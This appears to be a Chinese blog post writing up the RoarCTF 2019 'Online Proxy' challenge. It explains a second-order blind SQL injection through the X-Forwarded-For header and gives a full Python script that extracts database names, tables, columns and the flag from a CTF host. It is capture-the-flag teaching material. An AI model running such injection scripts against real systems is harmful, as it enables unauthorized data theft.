[RoarCTF 2019]Online Proxy

最新推荐文章于 2024-03-29 07:00:00 发布
最新推荐文章于 2024-03-29 07:00:00 发布
阅读量395 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43801002/article/details/107654488
版权

题目
image.png
image.png

知识点

  • X-Forwarded-For注入
  • 二次注入
  • 盲注

image

看了wp,知道注入点在X-Forwarded-For处,而且是个二次注入

回显的地方在这里

image

我们第一次输入

1' or '1

第二次和第三次都输入相同的数据,比如111

由于第一次输入的1’ or '1和第二次输入的111不一样,回显

image

此时1’ or ‘1 已经存入数据库中,而且111与1’ or ‘1不一样,所以服务器不会从数据库里查找1’ or '1,而是直接把上次的IP显示出来

当我们再输入一次111,即第三次的输入。此时的111与前面输入的111相同,相当于模拟ip不再变化,此时服务器要从数据库中查111的last ip,就会执行 1’ or '1

贴一下代码,注意flag不在当前数据库中

# coding:utf-8 
import requests
import time
url = 'http://node3.buuoj.cn:25869/'

res = ''
for i in range(1,200):
    print(i)
    left = 31
    right = 127
    mid = left + ((right - left)>>1)
    while left < right:
        #payload = "0' or (ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))>{}) or '0".format(i,mid)
        #payload  = "0' or (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = 'F4l9_D4t4B45e'),{},1))>{}) or '0".format(i,mid)
        #payload  = "0' or (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = 'F4l9_t4b1e'),{},1))>{}) or '0".format(i,mid)
        payload = "0' or (ascii(substr((select group_concat(F4l9_C01uMn) from F4l9_D4t4B45e.F4l9_t4b1e),{},1))>{}) or '0".format(i,mid)
        headers = {
                    'Cookie': 'track_uuid=6e17fe5e-140c-4138-dea6-d197aa6214e3',
                    'X-Forwarded-For': payload
                    }
        r = requests.post(url = url, headers = headers)

        payload = '111'
        headers = {
                    'Cookie': 'track_uuid=6e17fe5e-140c-4138-dea6-d197aa6214e3',
                    'X-Forwarded-For': payload
                    }
        r = requests.post(url = url, headers = headers)

        payload = '111'
        headers = {
                    'Cookie': 'track_uuid=6e17fe5e-140c-4138-dea6-d197aa6214e3',
                    'X-Forwarded-For': payload
                    } 
        r = requests.post(url = url, headers = headers)


        if r.status_code == 429:
            print('too fast')
            time.sleep(2)
        if 'Last Ip: 1'  in r.text:
            left = mid + 1
        elif 'Last Ip: 1' not in r.text:
            right = mid 
        mid = left + ((right-left)>>1)
    if mid == 31 or mid == 127:
        break
    res += chr(mid)
    print(str(mid),res)
    time.sleep(1)
# information_schema,ctftraining,mysql,performance_schema,test,ctf,F4l9_D4t4B45e
#F4l9_t4b1e
#F4l9_C01uMn
浩歌已行
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
[RoarCTF 2019]Online Proxy——二次注入,又是你?
Mrs_H的博客
10-30 942
前言 最近真属于是”多事之秋“了,平常不留作业的课最近都破天荒的留了作业。最近做题目的节奏又被打乱了,哎无语。之后想写一篇关于flask的文章,不知道什么时候才有机会,现在还是以sql注入为主。不说了,先看题吧。 正文 这道题又是二次注入的题目,但是注入点较之前的注入点位有很大的不同。这次的注入点在数据包头的XFF字段。 那么如何进行二次注入呢?请考虑如下代码 select '0'+(length(database())>0)+'0' from user 如果我们将上面的查询语句提前插入了数据库中,
Proxy Online
weixin_30527143的博客
12-14 710
http://freenuts.com/top-10-free-online-proxy-websites/ aniscartujo.com browse007.com enoughschool.com hidemy.biz nobodycanstop.us polysolve.com schoolisgood.com sslunblock.com www.dtunnel.c...
[RoarCTF 2019]Online Proxy(x-forwarded-for盲注)
qq_62046696的博客
01-05 607
这道题点开题目然后题目显示不出网,一开始误认为是ssrf了,但是没有更多的信息了。源码有一个ip会不会是修改X-Forwarded-For就可以了呢,抓包试一下,发现有两个ip,一个当前一个是last上一个的意思把,这个本地是我火狐插件默认的。然后这里因为我经验少没感觉,看了大佬的讲解,才突然悟了,这一眼就可以看出一个sql注入的问题,因为last肯定存储到了一个数据库的里面不然查询10.244.80.206怎么能显示出来呢。
[RoarCTF 2019]Online Proxy --不会编程的崽
最新发布
不会编程的崽的博客
03-29 828
sql注入 盲注
[RoarCTF 2019]Online Proxy ip二次注入
qq_54929891的博客
04-28 579
打开题目发现hint有点像文件泄露,于是打算用伪协议下载一下各个源码 发现报错,以为是flag或者php被过滤了,于是我下别的html文件,依然如此…… 用dirsearch扫描只出来两个文件一个db.php还有一个不记得去了(第二天写的wp),但是都没什么用 试了很久,发现没有https://就会报错 感觉这里不是切入点了,于是我抓包看看有没有别的信息 看到有个ip点,想着是不是SSTI,便试试X-Forwarded-For 发现可以控制Current ip,然后上一个ip..
JsProxy A js proxy online
04-21
A js proxy online or js packer offline.See help.html for more information.
ProxyWeb:代理网页
07-23
代理人 这是代理背后的网络服务。 目前它基于 Play,但编写的代码允许轻松换出 REST 层。
Waysonline 突破局域网限制 可有免费时间
08-14
直接双击运行waysonline.exe,在弹出的网页窗口输入你在waysonline的帐号和密码(可免费注册),非会员请选择[公众服务区/PUBLIC GATEWAY]。登录成功以后,单击V3任务栏绿色小图标: 运行: - 方式1:用v3启动你希望代理的程序。 点击[运行程序/Start New Application],若只需代理游戏数据,不需要代理网页流量,选[除Web以外/Bypass Web Traffic](此为或双击图标时的默认方式),节省连接数及带宽,否则选[全部网络通讯/Include All Traffic]。在打开文件窗口里,选择要运行的应用、游戏程序或快捷方式,[打开]后即开始运行该程序,并通过Waysonline服务器进行通讯。 - 方式2:从正在运行的进程里面选择一个。 点击[选择进程/Attach to Process],在进程列表里选择希望代理的进程。当程序发起新建的网络连接时,就会通过V3代理出去。对于通过v3启动拦截无效的情况,可采用本方式,此方式对已经建立的连接并无作用。若你希望默认代理之后所有运行的程序,可以添加"Explorer.exe"进程。 成功: 当程序开始网络访问后,任务栏上V3小图标应有连接数以及数据变化。若你不希望某些程序使用V3代理,请在[选择进程]列表里移除当前运行的程序。该程序以后将不会通过V3代理,直至你重新添加。
BUUCTF--[RoarCTF 2019]Online Proxy
qq_46263951的博客
07-19 293
这里发现通过修改X-FORWARDED-FOR的值注释部分的内容也随之改变 尝试盲注,上传命令时第一次为Current Ip发现并不能执行,再次上传Current Ip时上次的Current Ip变为Last Ip也没有执行,再次send即可正常执行命令 简单尝试使用盲注得到所有库名,这里可以看到该方法是没问题的 ...
[RoarCTF 2019]Online Proxy 盲注
scrawman的博客
01-26 3093
[RoarCTF 2019]Online Proxy bp抓包放包,可以用X-Forwarded-For修改IP。last Ip是存在数据库里的,我们先写一个sql注入语句作为IP,然后再修改两次其他的IP。这两次的IP要一样,那么第二次系统就要从数据库中查询last Ip,触发sql注入。 盲注: import requests url = "http://node4.buuoj.cn:26940//" head = { "GET" : "/ HTTP/1.1", "Cookie" : "trac
几个在线的web代理
weixin_34186128的博客
08-14 769
http://www.cemsg.com/web/ http://pooling.info http://proxyol.com http://www.haozs.net/Proxyonline.htm http://web.proxycn.com/
JavaWeb -----代理 Proxy
xiaozhegaa的博客
03-12 3208
(一)引入:为什么会有代理!! 原因是:阻止对目标对象的直接访问,或者就是在执行目标对象时,在执行目标对象前后进行一系列的操作。举个例子来说,1:在执行一个方法之前必须要对该“方法”做“日记”,记录每个操作,这样可以在执行目标对象之前,先执行一个的操作,然后执行该方法。2:又如明星唱歌例子,商家首先找到该明星的代理公司,谈妥后再找该明星去唱歌,中间代理起拦截等的操作 (二)代理类别:步步推进,
JS - Proxy
weixin_43051270的博客
05-31 927
1. Proxy 简单介绍 Proxy 对象用于定义基本操作的自定义行为(如属性查找,赋值,枚举,函数调用等) Proxy 之 get 和 set 简单使用 var oData = { name: "tzh" }; var pro = new Proxy(oData, { set(target, key,...
Proxy proxy
09-13
Proxy proxy 是一个使用 Proxy 构造函数创建的代理实例。它通过 Proxy 构造函数的第一个参数 target 来指定要代理的目标对象,通过第二个参数 handler 来指定拦截操作的行为。Proxy 实例提供了一种机制,可以在目标对象之前进行拦截,并对外界的访问进行过滤和改写。Proxy 这个词的原意是代理,代表了 Proxy 实例在操作中充当了一个代理器的角色。 引用中的代码展示了创建一个代理实例的示例:var proxy = new Proxy(target, handler)。其中,target 是要代理的目标对象,handler 是一个拦截器对象,用来定义代理实例的拦截行为。 引用中的解释对 Proxy 的概念进行了解释,描述了它架设在目标对象之前的拦截层,外界对目标对象的访问都必须通过这层拦截。Proxy 实例可以对外界的访问进行过滤和改写。 引用中的代码展示了 get 方法拦截器的一个示例,其中第三个参数 receiver 总是指向原始的读操作所在的对象,通常情况下就是 Proxy 实例本身。这个示例可以用来判断 receiver 是否等于 Proxy 实例。 因此,Proxy proxy 是一个使用 Proxy 构造函数创建的代理实例,它可以拦截目标对象的访问并进行过滤和改写。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值